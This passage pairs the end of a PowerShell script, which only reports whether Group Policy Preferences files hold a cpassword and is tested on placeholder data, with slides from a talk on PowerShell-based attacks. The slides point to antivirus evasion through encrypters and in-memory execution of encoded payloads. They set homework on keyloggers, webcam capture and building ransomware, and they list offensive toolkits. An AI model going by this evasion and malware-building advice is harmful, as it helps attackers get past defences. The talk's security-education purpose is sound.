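                    # Report only that a value is present, never the value itself.
                    HasValue   = -not [string]::IsNullOrEmpty($node.GetAttribute('cpassword'))
                }
            }
        }
}

# Constructed sample tree: a Groups.xml with a placeholder cpassword and a Drives.xml
# without one. None of this is real GPO data.
$root = Join-Path ([IO.Path]::GetTempPath()) 'gpp-sample\{GPO-GUID-PLACEHOLDER}\MACHINE\Preferences'
New-Item -ItemType Directory -Path (Join-Path $root 'Groups'), (Join-Path $root 'Drives') -Force | Out-Null
Set-Content -Path (Join-Path $root 'Groups\Groups.xml') -Value @'
<Groups><User name="LocalAdmin"><Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE"/></User></Groups>
'@
Set-Content -Path (Join-Path $root 'Drives\Drives.xml') -Value @'
<Drives><Drive name="S:"><Properties action="U" path="\\fileserver\share"/></Drive></Drives>
'@

Find-GppCpassword -PoliciesPath $root | Format-Table -AutoSize
```

Only the Groups.xml entry is reported (Preference User, Account LocalAdmin, HasValue True); Drives.xml has no cpassword and produces nothing.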
34. Would you like some
exploitation with that, Sir?
• Default tools/exploits/payloads are detectable
– Customize them
– Design your own exploits
– Innovative encoding/encryption techniques
– Use PowerShell to execute it for you
• Examples
– Hyperion runtime encrypter by Nullsecurity.net
• Produces an AES encrypted executable that brute forces its own key in-memory
• Can bypass most anti-virus solutions
• http://nullsecurity.net/papers.html
– Alphanum + ASCII encode + Base64 your executable (use Metasploit's msfvenom to do this)
• Then use PowerShell to decode it in-memory and execute it
– Check out www.exploit-monday.com by Matthew Graeber for sample code
– Also check out the PowerShell code used in SET -
http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/
• Can bypass most anti-virus solutions
• http://www.offensive-security.com/metasploit-unleashed/Msfvenom
35. More??
• Homework
• Try out PowerShell based attacks using Social Engineering
Toolkit (SET)
• Recode Metasploit modules to be used within PowerShell
scripts
• Come up with innovative attacks using PowerShell.
– Webcam, microphone, keyloggers, etc.
• Naughty, naughty.
• How about designing your own ransomware
– Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not
accept any responsibility for your actions. Your actions, your responsibility. I
have warned you.
– http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
36. Powered by PowerShell
• Existing PowerShell based attack tools
– Metasploit PowerShell modules
– PowerSploit
– Nishang
– PowerSyringe
• Recommended Reads and References
– PowerShell for Pentesters
• http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
– PowerShell OMFG
• https://www.trustedsec.com/august-2010/powershell_omfg/
– PowerShell Code Repository
• http://poshcode.org/
– Windows PowerShell Cookbook
• By Lee Holmes
– Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned
• By Chris Gates (carnal0wnage)
• http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences
37. And to conclude
• Sys admins/Network admins/Managers
– Check out every new feature introduced by a vendor
– Is it necessary for your org? No? Remove/Disable it.
– Ensure AV is installed and updated on production environment.
– Attend more security conferences to find out what new tech
hackers could use to attack your organisation.
• Hacker/Pentesters
– Check out every new feature introduced by a vendor
– Look at how you can twist various features to do your bidding
– Don't rely on your attack tools
– Remember AV vendors are watching and catching up
– Push yourself – come up with innovative tech
– Communicate all new tech you find. Our community is very open. You
could end up finding an even better way to attack.